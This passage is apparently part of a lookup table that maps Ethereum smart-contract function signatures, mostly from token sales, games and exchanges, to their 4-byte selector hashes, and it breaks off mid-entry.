"SUPPLY_FOR_PARTNERSHIPS()": "0xaf713dda", "ONESATOSHIToken()": "0x5bc0b4db", "investedSumOnIco()": "0x5fc5e727", "proposalsNumber()": "0xd27d1bc4", "_isTransferAllowed(address,address,uint256)": "0xaa2df88b", "ETHero()": "0x3760153c", "EE(uint256,string,uint8,string)": "0x400a44b2", "CanToken()": "0x894ca160", "Gerritcoin()": "0xb04e74f2", "ExchangerPoint(address,address)": "0x0da30317", "LIVEToken()": "0xe1b41513", "CoinMarks(uint256,address)": "0x6d7cb00c", "Plendito()": "0x5f47ba42", "TigerToken(uint256,string,string)": "0x308e63f4", "Talent()": "0x9c665819", "CTWtoken()": "0x3c20307b", "BITCOINGAM()": "0x66badf4b", "MelonBitIndex_Erc223Token()": "0x1c490883", "FinishTokenSale()": "0x475c3001", "changePersonalMaxcap(uint256)": "0x409bc43c", "IsWhite(address)": "0xe56adb5f", "GetWhitelist(uint256)": "0x217cab2b", "RemoveWhitelist(address)": "0xa6667e18", "GetLengthofList()": "0x5c243f03", "AddWhitelist(address)": "0xe463fa6b", "tokensLeftForSale()": "0x96b58ac8", "transferRemainingTokens()": "0x63cc4aa2", "getFundingInfoOfPhase(uint8)": "0x1a6d7561", "setTiersInfo(uint8,uint256[],uint256[],uint256[],uint8[4])": "0x0828799b", "OodlebitToken()": "0x4801206e", "mintForwarder(uint256,bytes32,address)": "0xb17216f5", "GoodLuckCoin()": "0x9847d267", "ShNShToken()": "0x7c8b1fa2", "TokenECCAC(uint256,string,uint8,string)": "0xc6a2afa7", "updateLemontokensRemainingToDrop()": "0xf786cb82", "withdrawLemontokens()": "0x8d3af7eb", "LemonSelfDrop2()": "0x0c2073e4", "Bitcoincredit()": "0x73596cfc", "lockEtherPay()": "0xba7a8149", "getVersionsLength()": "0xa2a23fb2", "QDToken()": "0x386a646e", "MintableToken(uint256,string,uint8,string)": "0x78d19e42", "bsx(uint256,string,string)": "0x2a387bdd", "textaaaToken(address,uint256)": "0x38e7a375", "WatermelonBlockToken(address,address,address)": "0x13ca18ac", "AOSToken()": "0xbe31ffed", "MuseumsChain()": "0xa0b87d1e", "checkLock(address,address)": "0x28e3c4f8", "multiUnlock(address[])": "0x8d14670a", "multiLock(address[])": "0xf3512ce0", "multiMint(address[],uint256[],string)": "0x468ae69d", "_setCap(uint256,string)": "0xfbe3e1a2", "setCap(uint256,string)": "0xa70fc3ba", "burnOf(address,uint256)": "0xd3f233af", "startMinting(string)": "0x7f9bf9e4", "createPermissionsBot(address)": "0xb4b68dab", "setText(string,string)": "0xa9c73e80", "lockTextKey(string,uint256)": "0xfb1684f9", "lockAddress(uint256)": "0xbbf2ee4e", "lockOwnership(uint256)": "0x64beb745", "activatePermissionsBot(bytes32,bytes32)": "0xa2564afc", "RXPSale()": "0xaf7d4b21", "performFeelessTransaction(address,address,bytes,uint256,bytes)": "0x51b79495", "BING(uint256,string,string)": "0x9ec0505a", "EthereumEmerald()": "0xf4ad2212", "AFRTokenERC20(uint256,string,string)": "0x8dc43256", "getRelayingKing()": "0x3c7e03c1", "LavaWallet(address)": "0x47b24f15", "Irb()": "0x3ac46e6b", "TDz(uint256,string,uint8,string)": "0x69ffadc9", "OBIMOLOGIA()": "0x62ae4d29", "Buddha()": "0x622d82df", "getFundDetails(address)": "0x5c9cc81f", "Castor()": "0x20fcf2e5", "claimTokens(address[],address)": "0x988a18f6", "delOracle(address)": "0x7dc79375", "getWeiFromUsdCents(uint256)": "0xb9d8350e", "LerToken()": "0x29b737ae", "Fomo2D()": "0xbd656daf", "distributionFinishing()": "0x61571ddd", "openDistribution()": "0x5e11dc0b", "ChessCash()": "0xc0f17d13", "BitRRToken()": "0xe5ef0b95", "PXMCCoin(uint256,string,uint8,string)": "0x0c89ef67", "CRYPTOBULL()": "0xf922501a", "buyLand(uint256)": "0xced39558", "setForSale(uint256,bool,uint256)": "0xcf5c1b52", "setLandSlogan(uint256,string)": "0x6b98d78c", "setOwnerNick(uint256,string)": "0xb8e945fc", "getLandInfo(uint256)": "0x6f6f9bef", "getLandIdByKey(bytes8)": "0x9ea94877", "burnLand(uint256)": "0x6613221f", "HashLand()": "0x04f13e40", "GVE()": "0x06903ecc", "UHC()": "0xaf9fc8a8", "prepare(uint256,address,address,uint256)": "0x1ad065f1", "getTokenForCommunity(address,uint256)": "0x01500a97", "getTokenForInvester(address,uint256)": "0x7ffce58e", "getTokenForTeam(address,uint256)": "0x34d4cd82", "NVT()": "0x464858c6", "NVTFallback(address,uint256,uint256)": "0x8a62fd12", "SwytchToken()": "0xcc4c1c05", "JLCToken()": "0xeab184b8", "RCLTOKEN(uint256,string,string)": "0x67fad28d", "Bogocoin()": "0xcbbe2569", "GetLuckyResults()": "0x11c3a62f", "presaleTotalNumberTokenSold()": "0xada8a7d5", "sendBountySupplyToken(address)": "0xd5bf5fc3", "sendPlatformSupplyToken(address)": "0x281dfbb6", "sendAdvisorsSupplyToken(address)": "0xd157f27d", "sendTeamSupplyToken(address)": "0x83ba3a97", "forgive(uint16,uint32)": "0xd487758a", "setSecurityWalletAddr(address)": "0xe5045002", "censure(uint16,uint32)": "0x8f7a4738", "BetleyToken()": "0x520fa2c1", "getCensuredBy(uint16)": "0x0fb7a5e6", "getCensuredByCount(uint16)": "0xf98139be", "getCensuring(uint16)": "0xb6bcf354", "createIssuedToken(address[],uint256[],uint256,uint256,string,uint8,string)": "0x94f188be", "getCensuringCount(uint16)": "0x658cc376", "IssuedToken(address[],uint256[],uint256,uint256,address,string,uint8,string)": "0x5f0f7786", "transferCat(bytes5,address,address,uint256)": "0xce468922", "getCatDetails(bytes5)": "0x2f598404", "getCatRequestPrices()": "0x98f32d1d", "getCatOfferPrices()": "0xd728b6db", "getCatOwners()": "0x36ae31ec", "getCatNames()": "0x711d649b", "getCatIds()": "0x5d89c01a", "addGenesisCatGroup()": "0xa40c8ad0", "getRateIcoWithBonusByDate(uint256)": "0x5a86c914", "activateInTestMode()": "0x76b39cf9", "disableBeforeActivation()": "0xa318d521", "setStartIcoPreICO2ndRound(uint256)": "0x34b4eef2", "cancelAdoptionRequest(bytes5)": "0x9d8df6dd", "acceptAdoptionRequest(bytes5)": "0xd4a03f60", "CFTRAD()": "0xdda38380", "makeAdoptionRequest(bytes5)": "0xe65bbceb", "giveCat(bytes5,address)": "0xf884e54a", "acceptAdoptionOffer(bytes5)": "0x1be70510", "cancelAdoptionOffer(bytes5)": "0x5281947d", "makeAdoptionOfferToAddress(bytes5,uint256,address)": "0xa4202615", "makeAdoptionOffer(bytes5,uint256)": "0x05ca3557", "nameCat(bytes5,bytes32)": "0x74fe6dea", "Jimtoken()": "0x398af892", "rescueCat(bytes32)": "0x4946e206", "MoonCatRescue()": "0xd31d7b0a", "pay(address[],uint256[])": "0x084ce708", "Papergold()": "0xe274a3e7", "_createItem(string,address,uint256)": "0xe67c4f96", "createContractItem(string)": "0xbd05cb4d", "createPromoItem(address,string,uint256)": "0xae36c602", "CryptoTwitch()": "0xc94b0ac1", "InitialTreeICO()": "0x2e08eb77", "DDToken()": "0xb0fa5032", "createPresale(address,uint256,uint256)": "0xaef76dda", "_buyLandForCandy(address,uint256)": "0xc296f721", "getBuyLandInfo(address,uint256)": "0x54260cb6", "findRankByCount(uint256,uint256,uint256,uint256)": "0xb53b1f12", "_receiveBuyLandForCandy(address,uint256)": "0x7ea80eb2", "buyLandForCandy(uint256)": "0x53999040", "buyLandForEth()": "0xf6418b0b", "CandyLandSale(address)": "0x937c9e3c", "MAX_SUPPLY()": "0x32cb6b0c", "FDCToken()": "0xcf9b9e0a", "ENCToken(uint256,string,uint8,string)": "0x6352585c", "OwnerTransfer(address,address,uint256)": "0xd30796a2", "EthereumSmart(uint256,string,string)": "0xcd93307a", "TokenTESTToken()": "0x8b986566", "transferTimelocked(address,uint256)": "0x6559aeb2", "transferVesting(address,uint256,uint256,uint256)": "0xfcd735dd", "FloraFicToken()": "0xd038906a", "TMONEY()": "0xaedb8621", "EmilToken()": "0xea57d818", "HybridBlock()": "0xd76a0cb8", "unfreezeAccount(uint256)": "0x13b2e657", "freezeAccount(uint256)": "0xde3dac84", "RBC(uint256,string,string)": "0x1d36ee16", "GiroToken()": "0xb8a67b6e", "Noscam()": "0xf7e7d6d8", "addPurchased(uint256,uint256)": "0xd4ee9415", "setPurchased(address,address,uint256)": "0x9d2668d4", "desBan(address)": "0x02218ad6", "emergencyFlush()": "0xa06dd6dc", "setFeePrice(uint256)": "0x245ccdb7", "changeOracleAdd(address)": "0xefcd2ddd", "payToOracle(uint256,uint256)": "0x260b0bc8", "setResponse(address,string)": "0x600a686e", "editBalanceOf(address,address,uint256)": "0xb213d77d", "getResponse()": "0x18a30d16", "editLimits(uint256,uint256)": "0x090c01d0", "requestRate(string,string,bool,uint256,uint256)": "0x7e4c3b2e", "setDepositPpm(uint32)": "0xec82cf4e", "requestCoinToUSD(string,bool,uint256,uint256)": "0x8cb36aef", "sendAllFunds()": "0x707c4f05", "requestEtherToUSD(bool,uint256,uint256)": "0xf92fff12", "EthernityFinancialOracle()": "0x4f73b7fa", "MyNewToken()": "0xdb383bf2", "EFOcallBack(string)": "0x4c75dc8f", "Seller()": "0x07fd3687", "needsLotteryFinalization()": "0x3a79a55c", "finalizeBlock()": "0x75395a58", "getgamecardaddress(uint256)": "0x494278e3", "needsBlockFinalization()": "0x347cda88", "getgamecardsalemoneyuint256(uint256)": "0x2599c661", "sendToOtherBlockchain2(string,string,address)": "0x6e59e570", "sendToOtherBlockchain1(string,string)": "0x1a86d5b6", "update_oracalize()": "0xae42ce85", "myUsingOracalize()": "0x10768bdd", "ownerMigration(address)": "0x0876eb00", "tokenBurn(uint256)": "0x39451a88", "tokenIssue(uint256)": "0xaad00089", "removalBlackList(address)": "0xf7cfd902", "multipleTransfer(address[],uint256,uint256)": "0xa76d50ad", "privateTransfer(address,uint256)": "0x2b587555", "balanceOfUnlocked(address)": "0xceddd07d", "KeyFund(uint256,uint256)": "0x1e8d1510", "requireAuthorisation(bool)": "0x9a38ac79", "setCS(address)": "0xa2a483ee", "blockAccount(address)": "0x7c0a893d", "authoriseManyAccounts(address[])": "0x7fe11990", "authoriseAccount(address)": "0xb976f464", "setMinEsteemAmount(uint256)": "0x63eeb79a", "enable_sale()": "0x01ebd36b", "upgrade_cap()": "0xc7ccc559", "BuyerFund()": "0x6760115a", "VCChainToken()": "0x6b30f243", "strConcats(string,string)": "0x82776521", "strConcats(string,string,string)": "0x8348d71f", "strConcats(string,string,string,string)": "0xfaed86ab", "strConcats(string,string,string,string,string)": "0xdef5bbd0", "changeAcceptDice(bool)": "0x93623fb8", "EthDice50()": "0x314aabb5", "StephenHawking()": "0xe57a68da", "FreshWaterFlow()": "0x6c7c909f", "setGoalAchieved(bool)": "0xa839fc56", "TXOsale()": "0xf058e6d1", "TXOtoken(address)": "0x17d0aa13", "CRYPTOKEN(uint256,string,uint8,string)": "0x144c7e40", "NMFToken()": "0x42e3b919", "hardCapReached()": "0x9762f802", "saleDue()": "0xbea4ae88", "issueUnsoldToken()": "0x47eef00a", "LoopringToken(address)": "0xe8ed024e", "MobileTokenAlert()": "0x2c409871", "releaseTokens(uint256)": "0x4b0babdd", "freezeTokens(uint256)": "0xa4adc2f7", "NeuroToken()": "0xb7844aff", "EchoChainToken()": "0xcb4b9db1", "claimDay(uint16)": "0x81d693be", "getPriceByDayIndex(uint16)": "0x611c4662", "FFCTToken()": "0xd42151b0", "changeReceiver(address)": "0x547e3f06", "deleteFreezeList(address)": "0x73c1af76", "addFreezeList(address)": "0x43977911", "JOP(uint256)": "0x85bf96a0", "addCutie(uint32,uint256,uint256)": "0xa583535d", "DildoToken()": "0xb7f79374", "checkWrapperBalance()": "0xd5250364", "getQueryPrice(string)": "0x9b601c4d", "sendOracleData()": "0x9294e012", "getTotalETH()": "0x5f4c71f1", "getTotalToken()": "0x3d0673d4", "getLeftToken()": "0x5205b80f", "getInvestorByIndex(uint256)": "0xb21457e3", "getInvestorByValue(address,address)": "0x90f6b2b3", "getInvestorsETH(address,address)": "0x21b48008", "getInvestorsTokens(address,address)": "0x7fbb345e", "getSoldToken()": "0xf30a4a70", "getBalanceContract()": "0x66bd78fd", "sendToOwners(uint256)": "0x34ad324c", "calculateBonusForHours(uint256)": "0x6fb2d01e", "getTokensManual(address,address)": "0x763770d2", "refund(address,address,uint256)": "0x82ad6f35", "manualRefund()": "0x14c7bddf", "getFinishStatus()": "0x84780009", "getManualAddress(uint256)": "0x279aa01f", "getManualInvestorsCount()": "0xcb3694ba", "getManualByAddress(address,address)": "0xc6e3e8fd", "saveInfoAboutInvestors(address,address,uint256,uint256,bool)": "0x0f501d07", "getICODate()": "0x8c500418", "setICODate(uint256)": "0x31361399", "removePrivelegedWallet(address,address)": "0x610358ae", "setTransferOwnership(address,address)": "0x7227bff2", "setPrivelegedWallet(address,address)": "0x29ba1cb4", "grantedWallets(address,address)": "0x98251353", "sendToAddress(address,address,uint256)": "0xfbd95a39", "setTotalSupply()": "0x8bc05833", "calculateWithdrow()": "0x28dc38e6", "getWrapperData()": "0x3d756973", "getWrapperBalance()": "0x8747a674", "update(uint256,string,string)": "0xf95e0a54", "update(string,string)": "0xf4c84d19", "burnTokens(address,address)": "0x3f541d08", "getTotalTokenCount()": "0xe5362667", "Addresses()": "0x86897cb8", "BJLToken()": "0x01345514", "_existPublicKey(bytes32,address)": "0xb44ba774", "_existPlatform(bytes32)": "0xd6757f39", "_existCaller(address)": "0x5c146b80", "uintToStr(uint256,uint256)": "0x85f0e72c", "bytes32ToStr(bytes32)": "0xef0b2368", "changeVoters(bytes32,address,string)": "0x7fc5f05c", "hashMsg(bytes32,address,bytes32,address,uint256,bytes32,string)": "0xe316bd56", "XCPlugin()": "0xe053178a", "_assignRole(address,bytes32,address,uint256)": "0x93b4c69b", "assignRoleWithExpiration(address,bytes32,address,uint256)": "0x78e9f81f", "assignRole(address,bytes32,address)": "0xdc460933", "assignOwner(address,address)": "0xa7c7e2a0", "cbdc(uint256,string,string)": "0xde642b5a", "DoubleETH()": "0x0425ccba", "remainingFundsToEndAuction()": "0xb26209f6", "distributeGoTokens(address,address)": "0x2b90bb3a", "removeFromPrivateSaleWhitelist(address[])": "0xaed83846", "addToPrivateSaleWhitelist(address[])": "0xb6d31d97", "removeFromPublicSaleWhitelist(address[])": "0xe22497e4", "addToPublicSaleWhitelist(address[])": "0x8a0e5a75", "changePriceCurveSettings(uint256,uint256,uint256,uint256,uint256)": "0xeee908ed", "GoTokenDutchAuction(address,address,address,address,address,address,uint256,uint256,uint256,uint256,uint256)": "0xb024abad", "GoToken(address,address,address,address,uint256)": "0x5423a05d", "withdraw_excess_tokens(uint256)": "0xcb65c0f5", "withdraw_arbitrary_token(address,uint256)": "0x49f9e95e", "Deluxo()": "0x6b2148c2", "Unity()": "0x3fe75b8d", "CubaLibre()": "0xb764132e", "remainingReward()": "0xe1c4c9fe", "_releaseWithReward()": "0x8a6ee066", "_sendBack()": "0x05681031", "TOSLittleHodingContract()": "0xb3c7476c", "getWinnerListLength()": "0x0831fb6c", "getLoserAddressList()": "0x8bcb6f01", "getWinnerAddressList()": "0x5b93c2bc", "getPlayerOption()": "0xeb8e1660", "getEndGameStatus()": "0x72dee32b", "sendAwardToLastWinner()": "0x2f1d3e28", "sendAward()": "0x07786d0c", "forceEndGame()": "0xac187542", "submitChoose(uint256)": "0x0607dd94", "getGameData()": "0xaf4e99de", "getGamePlayingStatus()": "0x44219b05", "forceEndGame(address)": "0x493dbd02", "setJackpot(address,uint256)": "0x3ac4217c", "getEndedGames()": "0xb38400ff", "getDeployedGames()": "0xeae81c37", "createGame(uint256,uint256,string,address)": "0x04148f7e", "mine1000(uint256)": "0xea988ebd", "reinvest(uint256,bytes32)": "0x470a5f4e", "pyramid(address,uint256,bytes32)": "0x95c303bc", "chkConsul(address,uint256,bytes32)": "0x3886b116", "setBlockSze(uint256)": "0x1896367e", "owedAt(uint256)": "0x63fd7552", "callSurplus()": "0x5e3ced74", "addSurplus()": "0x4985b325", "updateMasterMinter(address)": "0xaa20e1e4", "configureMinter(address,uint256)": "0x4e44d956", "minterAllowance(address)": "0x8a6db9c3", "initialize(string,string,string,uint8,address,address,address,address)": "0x3357162b", "updatePauser(address)": "0x554bab3c", "updateBlacklister(address)": "0xad38bf22", "unBlacklist(address)": "0x1a895266", "isBlacklisted(address)": "0xfe575a87", "IBCA()": "0x5448c674", "stsc()": "0x1bc08834", "CGCCoin()": "0x877046a2", "finishSingleLock(address,address)": "0xa697ca14", "changeAdminer(address)": "0x85716e2f", "NewQ(string,bytes32)": "0x58e756b6", "StopQ()": "0x8df208b7", "StartQ(string,string)": "0x2add78bb", "tokensToEthereum_(uint256,uint256)": "0xfa352dec", "tokensToEthereum_3(uint256,uint256)": "0xe35d75a9", "tokensToEthereum_2(uint256)": "0x8cfe6a09", "tokensToEthereum_1(uint256,uint256)": "0x974811fb", "SigmaIOToken()": "0x8bf85ef0", "finalizeFunding(address)": "0xc1ad7925", "HungrCoin()": "0xe3b09a85", "validHolder(address)": "0x0bbf709a", "_unlockToken(address)": "0xce830f5b", "_lockToken(address,uint256)": "0xc0ee6db8", "SPRToken()": "0xac63208d", "GOSHUIN()": "0xf70c92de", "VERToken()": "0x981101f5", "distributeTheSameAmountOfTokens(address[],uint256)": "0x4e880082", "_moveStage()": "0x57b34be7", "updateRates(uint256,uint256,uint256)": "0xc0f3622c", "kickoff()": "0x980f62b1", "_leapYearsBefore(uint256)": "0x9d2235e7", "_isLeapYear(uint16)": "0xc813e02e", "_getYear(uint256)": "0x83563dc6", "endsigning()": "0xcf157942", "takedaily(address)": "0x83a51213", "spendlarge(uint256,uint256,uint256)": "0x1787119c", "SetGasLimit(uint256)": "0xf5bdeca1", "sendsignature()": "0x6ed3f468", "tokenBack(address[],uint256[])": "0x7ba1e407", "CARXTOKEN()": "0xa277b787", "ContributorPool(address,uint256,int256,uint256,int256)": "0x66c82de8", "Goahead()": "0xa80fe377", "TOSInstitutionsHoldingContract()": "0x993f3197", "TOSPrivateIncentiveContract()": "0xf2f62ac7", "WELTCOIN()": "0x5d9796eb", "dCoinswapToken()": "0x56ce3f5c", "updateAff(uint256,uint256,uint256,uint256)": "0x414b7ad6", "GROWCHAIN(uint256,string,string)": "0x4eea636f", "_setFreezedBalance(address,uint256,uint256)": "0xc718d0e0", "setNewDepositCommission(uint256)": "0xe510989a", "getWei(uint256)": "0xe942c564", "setNewPrice(uint256)": "0xee8cdd4e", "deleteInvestorTokens(address,uint256)": "0x98cf6dd3", "setRubusOrangeAddress(address,address)": "0x0ef60e48", "MotorToken()": "0x1b28985e", "AssetISR()": "0xd932b248", "OrpheusOrganicsLaos()": "0x200d10dc", "HeroTokenAuction(uint256)": "0x5255a07b", "_createAuction(uint256,uint256,uint256,uint256,address)": "0x57fc990f", "ERC721DutchAuction(address,uint256)": "0x7fdbd0f2", "migrateHero(uint256,address)": "0xb430da3c", "_createHero(uint256,address)": "0x5bf5c29c", "triggerCooldown(uint256)": "0xa540db73", "setHeroGenes(uint256,uint256)": "0x15e839c1", "createHero(uint256,address)": "0x14fbc22b", "getOwnerTokens(address)": "0xd63d4af0", "assignAnotherOwner2(address)": "0x579e0b87", "assignAnotherOwner1(address)": "0xed047efd", "resetTokenOwnership()": "0xf43098af", "YoloTokenPresaleRound2(uint256,uint256,uint256,uint256,address,address)": "0xc5c78258", "YoloToken(uint256)": "0xa377b34e", "querySpecialRateForAddress(address,address)": "0xc3f03fb8", "removeFromSpecialRatesMapping(address,address)": "0x51a073fb", "addToSpecialRatesMapping(address,address,uint256)": "0x3cd78a2b", "SpecialRatedCrowdsale()": "0x3134f4f1", "Infinix()": "0x74998f33", "WICCrowdsale(address,uint256,uint256,uint256,address,address)": "0x7632b18b", "purchaseInternal(uint256,address)": "0xbe99c50f", "etherToSendCharity()": "0x3b545d2f", "payCharity()": "0x4071f89b", "Etheropoly()": "0x7462e4f9", "transferOwner(address,uint256)": "0xe53c4548", "O2OToken(uint256,string,string)": "0xcad2042f", "unsale()": "0xebe22b12", "ExBatallionCoin()": "0x4548821c", "VIPSToken()": "0x5a57a901", "payout(address[],uint256[])": "0xc176e639", "BountyEscrow()": "0x076ae31d", "KyberContirbutorWhitelist()": "0x30962d4d", "distributeLCD(address[],uint256)": "0xa9a6e9b4", "LUCYD()": "0xc46073f7", "changePeriods(uint256,uint256,uint256,uint256,uint256)": "0x16b6c75b", "setProfitOwner(address)": "0xf4b186a7", "transferManagment2(address)": "0x3391c265", "transferManagment1(address)": "0x2fbac05c", "Rhinex()": "0x6cf9ea99", "ArcanaToken()": "0xc8e5f54f", "totalLockedHavvens_byAvailableHavvens_limitedSum()": "0x3d1bd1bf", "totalLockedHavvens_limitedSum()": "0x5ab58d64", "totalLockedHavvens()": "0x73d0fe48", "totalIssuanceDebt_limitedSum()": "0x37b9756b", "totalIssuanceDebt()": "0x62abda69", "totalNetworkCollateralisation()": "0x50754fac", "totalIssuerCollateralisation()": "0xc747f120", "collateralisation(address)": "0xdb6648c0", "totalIssuingCollateral_limitedSum()": "0x6359b5b1", "totalIssuingCollateral()": "0xb9c7ce49", "_limitedTotalIssuingCollateral(uint256)": "0x3817ffda", "collateral(address)": "0xa5fdc5de", "resizeIssuersArray(uint256)": "0x2a9ba092", "deleteIssuer(uint256)": "0xa021d76d", "pushIssuers(address[])": "0x23fe6146", "pushIssuer(address)": "0x09d37704", "setMaxIssuers(uint256)": "0x244c91d4", "nominateNewOwner(address)": "0x1627540c", "availableHavvens(address)": "0xf876fe1a", "ETHERION()": "0xcf082176", "BPPOL()": "0x1c5a3942", "PrivateCoin()": "0xf1da588a", "FZTToken(address)": "0x4cb6bf73", "ownerSetOraclizeGas(uint256,uint256)": "0xc82db402", "getProfit(uint8,uint256)": "0xc4400ed4", "getHouseEdgeFee(uint8,uint256)": "0xb82864e0", "increaseJackpot(uint256,bytes32,address,address,uint256)": "0x3d6b6c70", "oddEven(uint8)": "0xe0304542", "playerRoll(uint8,uint8)": "0x490052a8", "DiceRoll()": "0x754e1764", "PerformAirDrop()": "0x3d888aa5", "EPXAirDrop()": "0xf12782b2", "withdrawPreSigned(address,uint256,address,uint256,uint256,address,uint8,bytes32,bytes32)": "0x4b41cb60", "availableVolumeEtherDelta(address,uint256,address,uint256,uint256,uint256,address,uint256)": "0x31f6eac8", "availableVolumeEnclaves(address,uint256,address,uint256,uint256,uint256,address,uint8,bytes32,bytes32)": "0x969283e2", "checkSig(bytes32,bytes32,uint8,bytes32,bytes32,address)": "0xfa043b0f", "_trade(address,uint256,address,uint256,address,uint256,bytes32)": "0x04fda0d8", "trade(address,uint256,address,uint256,uint256,uint256,address,uint8,bytes32,bytes32,uint256,bool)": "0x9b788752", "_tradeEtherDelta(address,uint256,address,uint256,uint256,uint256,address,uint8,bytes32,bytes32,uint256)": "0x6f3395b2", "tradeEtherDelta(address,uint256,address,uint256,uint256,uint256,address,uint8,bytes32,bytes32,uint256,bool)": "0x04f1e4e2", "rebalanceEnclaves(address,uint256)": "0x91c49026", "rebalanceEtherDelta(address,uint256)": "0x6362102d", "withdrawBoth(address,uint256,uint256)": "0x91feea93", "withdrawTokenMulti(address[],uint256[])": "0xf700ead9", "withdrawTokenUser(address,uint256,address)": "0xedf0ede3", "withdrawUser(uint256,address)": "0x97e9beef", "processDeposits(address,uint256)": "0x3b25a6b9", "depositBoth(address,uint256)": "0x4b56cd27", "depositEther(uint256)": "0x26839f17", "changeFreezeTrading(bool)": "0x51731f21", "changeFeeAmountThreshold(uint256)": "0xbfcabcbf", "setUseEIP712(bool)": "0x251d3589", "setNodePrice(uint256)": "0xb34f594b", "getNodePrice()": "0xa5021a17", "getTokenCap()": "0x2f087a28", "getMintingFinished()": "0x676cb63d", "getTokenDecimals()": "0x24f65ee7", "EcroContract(uint256,uint256,uint256,uint256,uint256)": "0x2fce1291", "removeMasterNodes(address,uint256)": "0x7c4057ae", "addMasterNodes(address,uint256,uint256)": "0xac8d6632", "getMasterNodes(address,uint256)": "0x3a3af53f", "getMasterNodesDates(address)": "0x961d30cc", "setTotalAllowed(address,uint256)": "0xfb72fdfe", "getTotalAllowed(address)": "0x965232c0", "getQuery(uint256)": "0xaeb2ffc1", "getusedAPI()": "0x665b51ce", "pushData()": "0xc692c049", "retrieveData(uint256)": "0x5bee29b7", "transfer_eth_from_contract(address,uint256)": "0x9cd08464", "transfer_eth_to_contract()": "0x1bc5ee1a", "transfer_tokens_from_contract(address,uint256)": "0xdc3ccfdd", "transfer_tokens_through_proxy_to_contract(address,address,uint256)": "0x2420703e", "withdraw_arbitrary_token(address)": "0x706605b9", "change_admin(address)": "0x158686b5", "ExpandandHarvest(uint256)": "0xc370d8fe", "onlyHarvest(uint256)": "0x544b1b24", "buy100ktickets()": "0x50d4bf15", "buy10ktickets()": "0xe6d55f3a", "buy1ktickets()": "0x2483761f", "buy100tickets()": "0xc3ae43a0", "buy10tickets()": "0x6f264776", "buy1ticket()": "0x30d2474f", "amountofp3d()": "0x93d51daf", "INVEToken(address)": "0xcaf597f3", "mintme()": "0x08def058", "getPonziFriend(address)": "0x09b86f84", "newPonziFriend(uint256)": "0x867c0547", "OEN()": "0xd18165f6", "GTDNToken()": "0x56860ddc", "SmogToken()": "0xe23eaae6", "Decentralized()": "0xe24fe110", "_unmountSameSocketItem(address,uint256,address,uint256)": "0x195b616c", "_createAvatar(address,string,uint256)": "0xf5f4123f", "batchUnmount(address,uint256[],uint256)": "0xaeddab95", "batchMount(address,uint256[],uint256)": "0xed060ac1", "updateBaseURI(string)": "0x931688cb", "erc223Received(address,uint256,address,uint256)": "0x4f8fb544", "removeERC223(uint256,address,uint256)": "0xd781fbf9", "childExists(address,uint256)": "0x5680a3ad", "_removeChild(uint256,address,uint256)": "0x19a1c691", "_receiveChild(address,uint256,address,uint256)": "0x65bfdb0b", "_getChild(address,uint256,address,uint256)": "0x595aed65", "_transferChild(address,address,uint256)": "0xd4878cac", "erc20ContractByIndex(uint256,uint256)": "0x627c81ff", "totalERC20Contracts(uint256)": "0xa7811732", "getERC20(address,uint256,address,uint256)": "0x07cff6f2", "transferERC223(uint256,address,address,uint256,bytes)": "0xd49d1bac", "transferERC20(uint256,address,address,uint256)": "0x830ef41b", "balanceOfERC20(uint256,address)": "0xe226ed22", "childTokenByIndex(uint256,address,uint256)": "0x160b01a1", "totalChildTokens(uint256,address)": "0x35b21ceb", "childContractByIndex(uint256,uint256)": "0x0d5a621b", "totalChildContracts(uint256)": "0x8da7d0b5", "getChild(address,uint256,address,uint256)": "0xba6b5f96", "safeTransferChild(address,address,uint256,bytes)": "0xfdf7983a", "safeTransferChild(address,address,uint256)": "0x57e49ca8", "transferChild(address,address,uint256)": "0x57e1fae2", "onERC998Removed(address,address,uint256,bytes)": "0x0da719ec", "ownerOfChild(address,uint256)": "0xeadb80b8", "tokenOwnerOf(uint256)": "0x89885a59", "compareItemSlots(uint256,uint256)": "0xbc104f24", "generateUrl(string,uint256)": "0x25ac29da", "purchaseTokens(address,uint256)": "0x22ea2231", "reinvestByProxy(address)": "0xf9b04f72", "setReferral(address)": "0x9e5914da", "buyFor(address,address)": "0xcaa877e7", "reinvestFor(address)": "0x6c617048", "publishConditions(string)": "0xe26c551e", "getBlacklist(address)": "0x5d77d8d0", "addBlacklist(address,bool)": "0x17ca2e41", "_removeAllActiveTasksWithHoles(uint256,uint256)": "0x74a9446e", "getCompletedTasks()": "0x6c830f4b", "getActiveTasks()": "0x6127f246", "completedTasks(uint256)": "0x40d22cf8", "tasks(uint256)": "0x8d977672", "allTasksCount()": "0x7adfec71", "haveCommonPrefixUntilZero(bytes32,bytes32)": "0xd384d177", "requestWithdraw()": "0xb3423eec", "emitWithrawalRequestEvent(address,address)": "0xf42ef9ec", "setWithdrawalCoolingPeriod(uint256)": "0x41f99b69", "getWithdrawalCoolingPeriod()": "0xd6847cd8", "DFVToken()": "0x4e2ba115", "CUC()": "0x37bb223e", "preallocate(address,address,address,address)": "0x7e168086", "reachGoal()": "0x09e7d837", "updateEscrowGoalReached()": "0x3a289d1b", "escrowBalance()": "0xe11e1b0c", "GoinbitToken()": "0x8a4a8718", "DRONECOIN()": "0x82251b99", "mintMulti(address[],uint256[])": "0x46e4959d", "finishMintingSTO()": "0x1bc125f3", "finishMintingIssuer()": "0xa3f7e26d", "SOCXSentToETH()": "0xb6a2b110", "setPriceToRegSale()": "0x35ca8ce1", "StarmidFunc()": "0x66a8c45b", "RANGESTART_3()": "0x961f1d96", "deicmals()": "0x24d5336a", "CRYPTO_USD()": "0x2550c435", "cofoundersSupplyVestingTranches()": "0x22e9afca", "PHASE2_RATE()": "0xb8782d49", "eth_minimum()": "0xa5c860ba", "LIMIT()": "0xaf8214ef", "saleSuccessfullyFinished()": "0x96eecf95", "MIDGRADE_TYPE_COUNT()": "0x1dbdd792", "checkVotingForAllowTransfer()": "0xb198ef45", "weekOneRate()": "0x9397f2a2", "secondChangeBlock()": "0x3125443d", "TOKEN_HARDCAP()": "0x847e09f2", "startPreICOTime()": "0x97912c2f", "STAT_MAX_VALUE()": "0xaec1ee7b", "mintEnabled()": "0xd1239730", "STAKE_BONUS_RATIO()": "0x817e8332", "ico2Bonus()": "0x22a036dd", "minSale()": "0xa0877304", "amount_direct()": "0x272d20e7", "gambler2()": "0x455b33ab", "WEEKS_26()": "0xce6f149c", "pause_1()": "0x19e1568c", "blocksByDay()": "0x100153b6", "limitTokenForSale()": "0x05f6d329", "getPreIcoFunds()": "0xb19208f3", "communityTokenHolder()": "0xa860d119", "PRICE_3()": "0xc72e8baf", "completedGames()": "0x5edfd788", "cresusAddress()": "0x02c9e537", "isStop()": "0x97779e1b", "vent()": "0x1406b921", "outToken()": 